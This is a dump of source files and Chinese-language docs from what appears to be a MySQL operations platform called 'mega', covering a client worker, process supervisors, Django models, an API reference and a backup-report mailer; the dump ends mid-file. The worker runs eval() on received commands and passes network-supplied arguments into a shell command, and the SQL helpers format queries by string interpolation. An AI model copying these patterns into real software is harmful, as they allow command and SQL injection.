"num_lines": 96, "path": "/src/mega_client/mega_client/worker.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.worker\n'''\nimport os\nimport sys\nimport time\nimport commands\n\nimport ping\nfrom setting import SCRIPT_DIR,DEFAULT_TARGET,KEEPALIVE\nfrom logs import Logger\n\n\nMODEL='Worker'\nlog = Logger(MODEL).log()\n\n\nclass Worker():\n \n def __init__(self,cmd):\n self.cmd=cmd\n self.error=''\n self.error_code=0\n self.data={}\n \n def _work_resolve(self):\n '''\n {'TARGET': 'python', 'ARGS': \"{'ip': u'localhost', 'version': u'5.6', 'id': 12L, 'port': 3310L}\", \n 'VALUE': 'test.py', 'TIME': 0, 'TYPE': 0, 'CYCLE': 0}\n TYPE:\n 0 call the script outside mega project:setting.SCRIPT_DIR\n 1 call the script in diretory :mega_client/script/\n '''\n _item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n _data={}\n self.cmd=eval(self.cmd)\n for i in _item:\n _data[i]=self.cmd.get(i,None)\n if not _data['VALUE']:\n return False\n if not _data['TARGET']:\n _data['TARGET']=DEFAULT_TARGET\n self.data=_data\n log.debug(self.data)\n return True\n \n def run(self):\n if not self._work_resolve():\n return self.error_code,self.error\n _cmd_type=self.data.get('TARGET')\n _type=self.data.get('TYPE')\n if int(_type) == 0 :\n script_dir=SCRIPT_DIR\n else:\n script_dir=os.path.join(sys.path[0],'script/')\n if _cmd_type== 'cmd':\n _cmd_type=''\n _cmd=\"%s %s%s \\\"%s\\\" \" % (_cmd_type,script_dir,self.data['VALUE'],self.data['ARGS'])\n log.debug(_cmd)\n status,output=commands.getstatusoutput(_cmd)\n if status <>0:\n log.error(str(status)+' : '+output)\n return status,output\n \n \nclass Monitor():\n '''\n client monitor\n '''\n \n def __init__(self):\n self.sleep=KEEPALIVE\n \n def monitor(self):\n log.info(\"Monitor is Starting...\")\n _count=0 \n while 1:\n try:\n keepalive=ping.main()\n if keepalive == 'failed':\n _count+=1\n log.error('keepalive check :%s'% keepalive)\n else:\n self.sleep=KEEPALIVE \n if _count >100:\n self.sleep+=60\n log.error('keepalive check :%s for %s times ,abort!'% (keepalive,_count))\n time.sleep(self.sleep)\n except Exception as ex:\n log.error(ex)\n return" }, { "alpha_fraction": 0.46720612049102783, "alphanum_fraction": 0.4727427661418915, "avg_line_length": 26.313953399658203, "blob_id": "088936cfb38b51676cfc1f57011c43ec60e01c38", "content_id": "f5470185c3f98267cf9d91a66ed33e0083ebdff4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2348, "license_type": "no_license", "max_line_length": 83, "num_lines": 86, "path": "/src/mega_client/mega-1.0/mega_client/client_main.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.client_main\n'''\nimport os\nimport sys\nimport time\nimport datetime\nimport multiprocessing\n\napp_path=os.path.dirname(sys.path[0])\nsys.path.append(app_path)\n\nfrom listener import tcp_server\nfrom logs import Logger\nfrom worker import Monitor\n\nMODEL='ClientMain'\nlog = Logger(MODEL).log()\n\ndef main(pidfile=None): \n log.info(\"=============BEGIN===========\")\n log.info('Mega Client server start at %s ' % datetime.datetime.now())\n thread=[]\n child_pids=[]\n childs={\"Client Monitor\":Monitor().monitor,\n \"Client Listener\":tcp_server\n }\n try:\n for child in childs.items():\n c=sub_process(child)\n if c:\n thread.append(c)\n except Exception as ex:\n log.error(ex)\n \n for t in thread:\n t.daemon=True\n t.start()\n child_pids.append(t.pid)\n file(pidfile,'a+').write(\"%s\\n\" % t.pid)\n log.info((t.pid,t.name))\n\n \n #restart the subprocess if error occur \n while 1:\n time.sleep(30)\n try:\n for t in thread:\n if t.is_alive() == False:\n if t.pid in child_pids:\n child_pids.remove(t.pid)\n if t in thread:\n thread.remove(t)\n #try to restart the dead sub process\n _t=sub_process((t.name,childs.get(t.name))) \n thread.append(_t)\n _t.start() \n child_pids.append(_t.pid)\n log.info((_t.pid,_t.name))\n \n #flush the pids into pid file\n if pidfile:\n f=open(pidfile,'w')\n #f.truncate()\n for pid in child_pids:\n f.write(\"%s\\n\" % pid)\n f.flush()\n f.close() \n except Exception as ex:\n log.error(ex)\n break\n return child_pids\n\ndef sub_process(func):\n if not func:\n return False\n return multiprocessing.Process(target=func[1],args=(),name=func[0])\n \n \nif __name__=='__main__':\n main()" }, { "alpha_fraction": 0.5082101821899414, "alphanum_fraction": 0.5706075429916382, "avg_line_length": 24.113401412963867, "blob_id": "5499b78b8cda5f49c4868e0b4b373875f28c980e", "content_id": "cd9ce29b62a9d9a59354de0a08ebc3b976245ddd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2990, "license_type": "no_license", "max_line_length": 91, "num_lines": 97, "path": "/docs/slow_log.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# Slow Log 慢查询分析统计\n##功能点\n * 收集查询明细及执行计划\n * 按维度聚合分析慢查询\n * 趋势分析\n \n##配置要求\n* 开启慢查询\n* 设置慢查询登记时间\n* \n\n##流程\n 收集脚本 -> sender -> listener -> worker ->api:slowlog -> db : slow_log \n \n 离线分析模块 -> 统计数据模块 -> web 页面\n \n \n \n##接口定义\n\n\tvar='''\n \t{'db_host': '127.0.0.1',\n\t 'port': 3306,\n \t'start_time':'0000-00-00 00:00:00',\n\t 'user':'xchliu',\n\t 'user_host':'127.0.0.1',\n \t'query_time': 20,\n\t 'lock_time':12,\n\t 'rows_sent':21,\n\t 'rows_examined':22,\n\t 'sql_text':'select 1',\n\t 'sql_explained':\"{test:test}\"\n\t}\n\t'''\n\n\n##统计项\n1. 全局按天慢查询总数\n2. 全局按执行时长分布\n3. 全局按执行时间分布\n4. 实例按天慢查询变化\n5. sql 格式化后聚合统计\n6. topsql 按次数,时长,row排序\n\n### 统计逻辑\n\n1. 统计每小时进行一次,计算上一小时接受的慢查询信息。\n2. 遍历数据集对每一个slowlog 进行解析,格式化,计算维度值(time,row,count)\n3. 更新按实例统计维度表。slowlog_time_hour\n3. 更新按天统计表\n\n\n##数据表设计\n\n\tCREATE TABLE `slowlog_info` (\n\t `id` int(11) NOT NULL AUTO_INCREMENT,\n\t `db_host` varchar(200) COLLATE utf8_bin DEFAULT NULL,\n\t `port` int(11) DEFAULT NULL,\n\t `start_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n\t `user` varchar(200) COLLATE utf8_bin DEFAULT NULL,\n\t `user_host` varchar(200) COLLATE utf8_bin DEFAULT NULL,\n\t `query_time` float(10,4) DEFAULT NULL,\n\t `lock_time` float(10,4) DEFAULT NULL,\n\t `rows_sent` int(11) DEFAULT NULL,\n\t `rows_examined` int(11) DEFAULT NULL,\n\t `sql_text` mediumtext COLLATE utf8_bin,\n\t `sql_explained` mediumtext COLLATE utf8_bin,\n\t PRIMARY KEY (`id`)\n\t) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COLLATE=utf8_bin\n\n##元数据\n\t\n\tTime: 140228 16:15:10\n\tUser@Host: root[root] @ [127.0.0.1] Id: 15\n\tQuery_time: 2.201578 Lock_time: 0.000080 Rows_sent: 1170482 Rows_examined: 1170482\n\tuse dm;\n\tSET\ttimestamp=1393575310;\n\tSELECT /*!40001 SQL_NO_CACHE */ * FROM `fct_dat_moto_sp_pay_day`;\n\n执行计划:\n\t\n\tmysql> explain select * from user;\n\t+----+-------------+-------+------+---------------+------+---------+------+------+-------+\n\t| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |\n\t+----+-------------+-------+------+---------------+------+---------+------+------+-------+\n\t| 1 | SIMPLE | user | ALL | NULL | NULL | NULL | NULL | 7 | |\n\t+----+-------------+-------+------+---------------+------+---------+------+------+-------+\n\t1 row in set (0.00 sec)\n\n##规则说明\n1.sql唯一性\n\t使用sql解析时的timestamp和sql一起生成一个hash,用于标识一类唯一的sql:\n\t\t \n\treturn hash(str(time.time())+str)\n2.sql 解析\n\n配置所有变量并替换为N。不区分类型。样例sql可通过hash值获取。\n" }, { "alpha_fraction": 0.4947916567325592, "alphanum_fraction": 0.5182291865348816, "avg_line_length": 21, "blob_id": "48acd233dbbaaaf816affb20df68c38fdc569ff1", "content_id": "c5fd18b904ace4918148268fbb68edb07edacf44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 56, "num_lines": 17, "path": "/src/mega_web/mega_portal/file_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 29, 2014\n\n@author: xchliu\n\n@module:mega_portal.file_manage\n'''\nfrom django import forms\n\n\nclass UploadFileForm(forms.Form):\n# title =forms.CharField(max_length=50)\n file = forms.FileField(\n # label='Choose a file',\n # help_text='doc,ppt,pdf etc.'\n ) \n \n " }, { "alpha_fraction": 0.5581947565078735, "alphanum_fraction": 0.5914489030838013, "avg_line_length": 15.20512866973877, "blob_id": "1daa71417d74940aad48052044fa510bfe260ad5", "content_id": "ad3bd6ce4804ac06e31e7049726aafa07aff4353", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1263, "license_type": "no_license", "max_line_length": 67, "num_lines": 78, "path": "/src/scripts/mega_service.sh", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# Mega service init script\n#\n#\n#\n#Xchliu\n#2014-06-20\n###END\n\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\nNAME=mega\nDESC='Mega Service '\nAPP_DIR='/export/servers/app/mega/src/'\n#APP_DIR='..'\n\nMAIN_PWD=$APP_DIR/mega_service/daemon.py\nLOG_DIR=''\nPID_FILE=/var/run/$NAME.pid\n\nfunction is_alive()\n{\n\tPID=$1\n\tPSTATE=`ps -p \"$PID\" -o s=`\n\tif [ \"D\" = \"$PSTATE\" -o \"R\" = \"$PSTATE\" -o \"S\" = \"$PSTATE\" ]; then\n\t\t# Process is alive\n\t\techo 'A'\n\telse\n\t\t# Process is dead\n\t\techo 'D'\n\tfi\n}\n\nfunction stop_mega()\n{\n#\tif [ -f \"${PID_FILE}\" ];then\n#\t\tPID=`CAT $PID_FILE`\n#\t\tif [ 'A' = \"`is_alive $PID`\" ];then\n#\t\t\tkill -INT $PID\n#\t\tfi\n#\t\trm \"$PID_FILE\"\n#\tfi\n\tsudo python $MAIN_PWD stop\n#echo \"${NAME} stop/waiting.\"\n}\n\nfunction start_mega()\n{\n\tsudo python $MAIN_PWD start\n}\ncase \"$1\" in\n\tstart)\n\t\techo -n \"Starting $DESC...\"\n\t\tstart_mega\n\t\techo -e \"\\033[32m Done \\033[0m\"\n\t\t;;\n\tstop)\n\t\techo -n \"Stopping $DESC...\"\n\t\tstop_mega\n\t\techo -e \"\\033[32m Done \\033[0m\"\n\t\t;;\n\trestart)\n\t\techo -n \"Restarting $DESC...\"\n\t\tstop_mega\n\t\tsleep 6\n\t\tstart_mega\n\t\techo -e \"\\033[32m Done \\033[0m\"\n\t\t;;\n\tstatus)\n\t\tstatus_of_proc -p $PID_FILE \"$DAEMON\" uwsgi && exit 0 || exit $?\n\t\t;;\n\t*)\n\t\techo \"Usage: $NAME {start|stop|restart|status}\" >&2\n\t\texit 1\n\t\t;;\nesac\n\nexit 0" }, { "alpha_fraction": 0.4812000095844269, "alphanum_fraction": 0.4828000068664551, "avg_line_length": 34.70000076293945, "blob_id": "1b18f98c3e2486293b7cb0a4f5a535326927f491", "content_id": "502205e4300c9eeeeeedee0f23c9723c20461153", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2500, "license_type": "no_license", "max_line_length": 106, "num_lines": 70, "path": "/src/mega_service/mega_main.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import datetime\nimport multiprocessing\nfrom listener import tcp_server\nfrom worker import Worker\nfrom tracker import Tracker\nfrom lib.logs import Logger\n\nMODEL='MAIN'\nlog=Logger(MODEL).log()\n\n\n\nclass SubProcess:\n def __init__(self):\n self.threads=[]\n self.child_pids=[]\n\n #===========================================================================\n # sub_process\n # Start the child processes:\n # 1.worker Resolve and do the jobs \n # 2.listens Accept task from mega sender \n # 3.trackers Track task from database\n # 4.monitor Internal monitor \n #===========================================================================\n def sub_process(self,pidfile):\n global queue\n queue = multiprocessing.Queue()\n worker=Worker(queue,).worker\n tracker=Tracker(queue).tracker\n try:\n log.info('Start Subprocess: ') \n workers=multiprocessing.Process(target=worker,args=(),name=\"Main Worker\")\n self.threads.append(workers) \n listeners=multiprocessing.Process(target=tcp_server,args=(queue,),name=\"TCP Listener\") \n self.threads.append(listeners) \n trackers=multiprocessing.Process(target=tracker,args=(),name=\"Tracker\")\n self.threads.append(trackers) \n monitor=multiprocessing.Process(target=self.monitor,args=(),name=\"Monitor\")\n self.threads.append(monitor)\n for t in self.threads:\n # t.daemon=True\n t.start()\n self.child_pids.append(t.pid)\n log.info([t.name,t.pid])\n if pidfile:\n file(pidfile,'a+').write(\"%s\\n\" % t.pid)\n for t in self.threads:\n t.join()\n except Exception as ex:\n log.warning('Get interrupt signal,quit now!')\n log.error(ex)\n self.pool_close()\n return self.child_pids\n \n #===========================================================================\n # monitor\n #===========================================================================\n def monitor(self):\n log.debug(self.child_pids)\n \n\n \ndef main(pidfile):\n log.info(\"=============BEGIN===========\")\n log.info('Mega server start at %s ' % datetime.datetime.now())\n SubProcess().sub_process(pidfile)\n\nif __name__ == \"__main__\":\n main()\n\n" }, { "alpha_fraction": 0.6154857277870178, "alphanum_fraction": 0.6432233452796936, "avg_line_length": 25.41319465637207, "blob_id": "7e46c2c263e7267da6df2550437800c39f8fcd20", "content_id": "7a6b2134aa2de18da7ba14f6bc72dabbeb5869c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7869, "license_type": "no_license", "max_line_length": 134, "num_lines": 288, "path": "/docs/api.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#API \n\n##通用API\n\n##资源池API\n*\tdef get_all_instance(model=None,stat=0,count=0):\n \n return all instance object as a list of dicts and an error code sign the result, 0 means success\n \n keys:\n \t\n \tid ip port server_id name level stat business_id business owner_id owner db_type ha_type online_date\n \n \n model :the model who do the api calling\n \n stat: \n \n \t\t0 all (default) \n 1 only the online instance \n 2 only the offline instances\n \n count: counts of instances for return ,default 0(all)\n \n* def get_all_server(model=None,stat=0,count=0):\n \n return a list of dicts and an error code sign the result, 0 means success\n \n keys: \n \t\n \tid,ip,name,os,stat,owner,owner_name,online_date\n \n model :the model who do the api calling\n \n stat: \n \t\n \t\t0 all (default) \n 1 only the online instance \n 2 only the offline instances\n \n \n count: counts of instances for return ,default 0(all)\n\n* def get_all_db(model=None,stat=0,count=0):\n \n return a list of dicts and an error code sign the result, 0 means success\n \n keys: \n \n\t\tid,ip,port,name,level,instance_id,business_id,business,owner,owner_nameo,nline_date,stat\n \n model :the model who do the api calling\n \n stat: \n \t\t\n \t\t0 all (default) \n 1 only the online instance \n 2 only the offline instances\n\n count: counts of instances for return ,default 0(all) \n* def get_instance(model=None,ip=None,port=3306):\n \n Return a dict of instance data and an error code \n \n keys : \n \t\n \tid ip port server_id stat name level db_type online_date business_id owner ha_type\n \n\tmodel:the model who do the api calling\n \n ip : instance ip\n \n port: port(default 3306)\n \n* def get_database(model=None,ip=None,port=3306,db=None):\n\n Return a dict of database data and an error code\n\n keys :\n \n\t id name level online_date business_id instance_id owner stat\n\n model:the model who do the api calling\n\n ip : instance ip\n\n port: port(default 3306)\n\n db : name of database\n\n* def get_server(model=None,ip=None):\n \n Return a dict of server data and an error code\n \n keys :\n \n \tstat name ip online_date owner os id\n \n model:the model who do the api calling\n \n ip : server ip\n\n* def add_server(ip,**args):\n \n Return an error code for the result of server add. 0 means success\n \n ip : server ip \n \n args: server base info ,if not given ,default value will be used\n \n keys:server_name,server_online,server_owner,server_os \n* def mod_server(ip,**args):\n \n Return an error code for the result of server modify. 0 means success\n \n ip : server ip \n \n args: server base info \n \n keys:\n \t\n \tserver_name,server_online,server_owner,server_os \n \n* def del_server(ip):\n\n Return an error code for the result of server del. 0 means success\n\n ip : server ip \n \n* def add_instance(ip,port,**args):\n \n Return an error code for the result of instance add. 0 means success\n \n ip: instance ip \n \n port: instance port\n \n args:\n \t\n \tinstance_level instance_name instance_bussiness instance_online instance_owner instance_dbtype instance_hatype\n \n If the server does not exists ,a new server will be add automatic\n* def mod_instance(ip,port,**args):\n\n\tReturn an error code for the result of server modify. 0 means success\n\n ip: instance ip \n\n port: instance port\n\n args:\n \t\n \tinstance_level instance_name instance_bussiness instance_online instance_owner instance_dbtype instance_hatype\n* def del_instance(ip,port):\n \n Return an error code for the result of instance del. 0 means success\n \n ip : server ip \n \n port : instance port\n* def add_database(db,ip,port,**args):\n \n Return an error code for the result of instance add. 0 means success\n \n ip : server ip \n \n db: db name\n \n port: instance port\n \n args: server base info ,if not given ,default value will be used\n\n keys:\n \n \tdatabase_ip database_port database_name database_level database_owner database_business database_online\n\n if the instance does not exists ,a new instance will be add automatic\n* def mod_database(ip,port,db,**args):\n \n Return an error code for the result of database modify. 0 means success\n \n ip : server ip \n \n db: db name\n \n port: instance port\n \n args: database base info ,if not given ,default value will be used\n \n keys:\n \n \tdatabase_ip database_port database_name database_level database_owner database_business database_online\n \n* def del_database(ip,port,db):\n\n Return an error code for the result of database del. 0 means success\n\n ip : server ip \n\n port : instance port\n\n db: db name\n\n* def failover(group_name,old_master,new_master,method,time):\n '''\n 1.update the instance and failover table ,change the replication relationship\n 2.save the switch log\n '''\n## 高可用接口\n###MySQL\n####接口定义\n\n* def update_ha_info(new_master,old_master):\n * new_master 新主库实例:\tIP:PORT\n * old_master 原主库实例:\tIP:PORT \n \n \tswitch the role inside a ha group\n\t master format:'1.1.1.1:3306' \n \n \t return :\n \t\tTrue | False\n \n* def add_failover_record(self,failover_id,method,old_master,new_master,failover_name=None):\n\n\t* failover_id 高可用ip,脚本调用传None\n\t* method \t\t切换方式\n\t* old_master 原主库实例\n\t* new_master 新主库实例\n\t* failover_name 高可用组名,脚本调用传组名称\n\t\n\t 1.add a failover record with a given failover id --used for mega web site\n 2.add record with a failover group name --used for command line ha switch\n \n return :\n None: failed to get the new record\n id(int): the new record for failover switch\n* def add_failover_record_detail(self,record_id,module,re_time,time_used,result,content):\n\t* record_id 任务号,由函数add_failover_record()返回或者mega 调用时提供\n\t* module 执行模块,\n\t* re_time \t 任务阶段记录时间\n\t* time_used 耗时\n\t* result \t 本阶段执行结果\n\t* content \t 执行信息\n\t\n\t\t record_id ,get from the function add_failover_record()\n 1.if task invoked by mega, the id will be given\n 2.if task begins from the command line, call the add_failover_record() and get the new record id befor add new detail logs\n \n return :\n\t\t\t\tTrue | False\n\n \n* def stat_failover_record(self,record_id,stat='Y'):\n\t* record_id 任务号\n\t* stat 执行结果,成功或者失败\n\t\t\n\t\t\t1.stat the result for a switch task\n\t\t\t\n\t\t\treturn :\n\t\t\t\tTrue | False\n\n####测试用例\n\n\t\timport time\n\t\tfrom mega_client import sender\n\t\tfrom mega_client.setting import MEGA_HOST\n\t\tformat='%Y-%m-%d %X'\n\t\tnow=time.strftime(format, time.localtime())\n\n\t\tcmd={\"update_ha_info\":\"'1.1.1.112:23','1.1.1.111:3306'\",\n\t\t #\"add_failover_record\":\"10,'ONLINE','1.1.1.112:23','1.1.1.111:3306'\",\n\t\t \"add_failover_record\":\"None,'ONLINE','1.1.1.112:23','1.1.1.111:3306','jjjj'\",\n\t\t \"stat_failover_record\":\"32,'Y'\",\n\t\t \"add_failover_record_detail\":\"31,'mega','%s','10','y','test the api'\" % now,\n \t\t}\n\t\tfor _cmd,f in cmd.iteritems():\n\t\t c=sender.MegaClient(host=MEGA_HOST,cmd=_cmd)\n\t\t r=c.run(func_args=f)\n\t\t c.close() \n\t\t print \"test %s %s: %s\" %(_cmd,f,r)\n\n运行效果:\n\t\n\t\txchliu@xchliu tests]$ python console_failover.py\n\t\ttest add_failover_record None,'ONLINE','1.1.1.112:23','1.1.1.111:3306','jjjj': 32\n\t\ttest add_failover_record_detail 31,'mega','2014-10-14 14:05:25','10','y','test the api': True\n\t\ttest update_ha_info '1.1.1.112:23','1.1.1.111:3306': False\n\t\ttest stat_failover_record 32,'Y': True\n" }, { "alpha_fraction": 0.6756551265716553, "alphanum_fraction": 0.6955943703651428, "avg_line_length": 31.918750762939453, "blob_id": "47340fd50e5a90b1b154deaf7db6bd48f3621e99", "content_id": "f3fc1ff4cd30671212e8dc268f6f7787663f2032", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5266, "license_type": "no_license", "max_line_length": 62, "num_lines": 160, "path": "/src/mega_web/entity/entity.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Server(models.Model):\n class Meta(object):\n db_table='server'\n \n id = models.AutoField(primary_key=True)\n ip = models.CharField(max_length=20)\n name = models.CharField(max_length=50)\n os = models.CharField(max_length=50)\n owner = models.CharField(max_length=50)\n online_date = models.DateTimeField(default=0)\n stat= models.IntegerField(default=1)\n type= models.IntegerField(default=1)\n plant= models.CharField(max_length=50)\n\nclass Instance(models.Model):\n class Meta(object):\n db_table='instance'\n \n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50) \n server_id = models.IntegerField(null=False)\n ip = models.CharField(max_length=20) \n port = models.IntegerField(null=False)\n owner = models.IntegerField(default=0)\n level = models.IntegerField(default=1)\n business_id = models.IntegerField(default=0)\n #mysql oracle etc\n db_type = models.CharField(max_length=10)\n #none mha mmm keepalived\n ha_type = models.CharField(max_length=10)\n #1 master >1 slave\n role= models.IntegerField(default=1)\n \n version = models.CharField(max_length=20)\n master_id=models.IntegerField(default=0)\n slowlog= models.IntegerField(default=1)\n data_collect=models.IntegerField(default=0)\n cnf_file=models.CharField(max_length=200)\n stat= models.IntegerField(default=1)\n online_date = models.DateTimeField(default=0)\n\n\nclass Database(models.Model):\n class Meta(object):\n db_table='databases'\n \n id = models.AutoField(primary_key=True)\n instance_id = models.IntegerField(null=False)\n name = models.CharField(max_length=16)\n business_id = models.IntegerField()\n level = models.IntegerField()\n owner = models.IntegerField()\n stat= models.IntegerField(default=1)\n online_date = models.DateTimeField(default=0)\n\n\nclass User(models.Model):\n class Meta(object):\n db_table='user'\n \n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=32) \n #dba op diaosi\n role = models.IntegerField()\n sign = models.IntegerField()\n pwd = models.CharField(max_length=10)\n p_id = models.IntegerField()\n phone = models.IntegerField()\n stat= models.IntegerField(default=1)\n \nclass Business(models.Model):\n class Meta(object):\n db_table='business'\n \n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=16) \n owner = models.IntegerField()\n phone = models.IntegerField()\n stat= models.IntegerField(default=1)\n\nclass Backup_History_Info(models.Model):\n class Meta(object):\n db_table='backup_history_info'\n \nclass Backup_Policy(models.Model):\n class Meta(object):\n db_table='backup_policy'\n id = models.AutoField(primary_key=True)\n host_ip=models.CharField(max_length=20)\n port=models.IntegerField(default=0)\n db_type=models.CharField(max_length=20)\n backup_tool=models.CharField(max_length=20)\n backup_level=models.CharField(max_length=20)\n level_value=models.CharField(max_length=8000)\n backup_type=models.CharField(max_length=20)\n need_data=models.CharField(max_length=2)\n need_schema=models.CharField(max_length=2)\n iscompressed=models.CharField(max_length=2)\n isencrypted=models.CharField(max_length=2)\n retention=models.IntegerField()\n is_schedule=models.IntegerField()\n cycle=models.CharField(max_length=20)\n backup_time=models.CharField(max_length=45)\n schedule_time=models.CharField(max_length=45)\n modify_time=models.DateTimeField(auto_now=True)\n \nclass Users(models.Model):\n class Meta(object):\n db_table='user'\n \n id = models.AutoField(primary_key=True) \n name=models.CharField(max_length=20)\n role=models.CharField(max_length=20)\n sign=models.CharField(max_length=20)\n pwd=models.CharField(max_length=20)\n p_id=models.IntegerField(default=1)\n phone=models.IntegerField()\n stat=models.IntegerField()\n \nclass Vip(models.Model):\n class Meta(object):\n db_table='vip'\n \n id = models.AutoField(primary_key=True) \n vip = models.CharField(max_length=50)\n domain = models.CharField(max_length=50)\n type = models.IntegerField()\n stat = models.IntegerField()\n plant= models.CharField(max_length=50)\n\n \nclass Document(models.Model):\n class Meta(object):\n db_table='document'\n file = models.FileField(upload_to='documents/%Y/%m/%d') \n\nclass Task(models.Model):\n class Meta(object):\n db_table='task'\n id=models.AutoField(primary_key=True)\n name=models.CharField(max_length=20)\n type=models.IntegerField(default=1)\n value=models.CharField(max_length=100)\n last_time=models.DateTimeField()\n cycle=models.IntegerField(default=1)\n target=models.CharField(max_length=200)\n owner=models.IntegerField(default=1)\n script=models.CharField(max_length=50)\n stat=models.IntegerField(default=1)\n create_time=models.DateTimeField(auto_now=True)\n\nclass Client(models.Model):\n class Meta(object):\n db_table='client'\n server_id=models.IntegerField(primary_key=True)\n version=models.CharField(max_length=20)\n heartbeat=models.DateTimeField(auto_now=True)" }, { "alpha_fraction": 0.6038960814476013, "alphanum_fraction": 0.6179653406143188, "avg_line_length": 24, "blob_id": "8e84ddf74e8f92a872a6fd7a41004cfe4d48c9e3", "content_id": "82296ec0df99a5780aa6e41bc977ddd18bd0c29b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 924, "license_type": "no_license", "max_line_length": 108, "num_lines": 37, "path": "/src/mega_service/resource/get_value.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 20, 2014\n\n@author: xchliu\n\n@module:mega_service.resource.test\n'''\nfrom lib.PyMysql import PyMySQL\n\ndef get_instance_newest_stat(instance_id,stat): \n q=PyMySQL() \n sql=\"select b.value from status a,status_his b where a.id=b.status_id and b.instance_id=%s and \\\n a.name='%s' order by b.id desc limit 1;\" % (instance_id,stat)\n result=q.fetchRow(sql)\n if result:\n result=result[0]\n else:\n result=0\n return result\n\ndef get_instance_newest_variable(instance_id,var): \n q=PyMySQL() \n sql=\"select b.value from variables a,variables_his b where a.id=b.variable_id and b.instance_id=%s and \\\n a.name='%s' order by b.id desc limit 1;\" % (instance_id,var)\n result=q.fetchRow(sql)\n if result:\n result=result[0]\n else:\n result=0\n return result\n\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3851657509803772, "alphanum_fraction": 0.39542093873023987, "avg_line_length": 54.18421173095703, "blob_id": "e062b5528c80f5b7d8b6d26c01586e5b806f74f1", "content_id": "cbe0c4bc8bb95520ea854d390204a18c112377cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4263, "license_type": "no_license", "max_line_length": 180, "num_lines": 76, "path": "/src/mega_service/report/daily.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 23, 2014\n\n@author: xchliu\n\n@module:mega_service.report.daily\n'''\nimport sys\nsys.path.append(\"/export/servers/app/mega/src/\")\nfrom lib.utils import today\nfrom lib.utils import SendMail\nfrom lib.PyMysql import PyMySQL\nfrom mega_web.console.backup import Backup\n\nMODEL='mega_daily_report'\n\ndef backup_report_daily(date=None):\n if not date:\n date=today(1)\n subject='Backup Daily Report for %s' % date\n temail=['[email protected]','[email protected]','[email protected]']\n sql=\"select host_ip,port,backup_tool,backup_level,backup_type,timediff(backup_end_time,backup_begin_time) as backup_time,file_size,message,backup_status \\\n from backup_history_info where date(backup_begin_time)='%s' order by backup_tool,host_ip;\" % date\n _cursor=PyMySQL().query(sql,'dict')\n if _cursor:\n _data=_cursor.fetchall()\n _statics_today=Backup().get_today_statics(date)\n _uninvoked_task=Backup().get_uninvoked_backup(date)\n\n #generate the email content\n head='<h3>配置总数:%s</h3><h4>备份成功:%s &#9; 备份失败:%s &#9; 备份未发起:%s</h4>' %(_statics_today.get('total_today',0),_statics_today.get('success_count',0),\n _statics_today.get('failure_count',0),\n (_statics_today.get('total_today',0)-(_statics_today.get('success_count',0)+_statics_today.get('failure_count',0)))\n )\n body='<table><tr bgcolor=\"#E6EED5\"><td></td><td>IP</td><td>PORT</td><td>工具</td><td>级别</td><td>类型</td><td>时间</td><td>大小(MB)</td><td>结果</td><td>消息</td></tr>'\n footer='<b>More Info:<a href=\"http://mega.db.cbpmgt.com/console/backup/\">mega</a><b>'\n data=''\n alt =True\n counts=1\n for _d in _data:\n if _d.get('backup_status') == 'Y':\n color='bgcolor=\"#FFFFFF\"' if alt else 'bgcolor=\"#E6EED5\"'\n else:\n color='bgcolor=\"#FF4500\"'\n data +='<tr %s><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s </td><td>%s</td><td>%s</td></tr>' %(\n color,counts,\n _d.get('host_ip'),_d.get('port'),\n _d.get('backup_tool'),_d.get('backup_level'),\n _d.get('backup_type'),_d.get('backup_time'),\n _d.get('file_size'),_d.get('backup_status'),\n _d.get('message')\n )\n alt=not alt\n counts+=1\n un_data='<hr>Uninvoked backup:<table>'\n counts=1\n for _t in _uninvoked_task:\n color='bgcolor=\"#FFE4E1\"'\n un_data +='<tr %s><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s </td></tr>' %(\n color,counts,\n _t[1],_t[2],_t[4],_t[5],\n 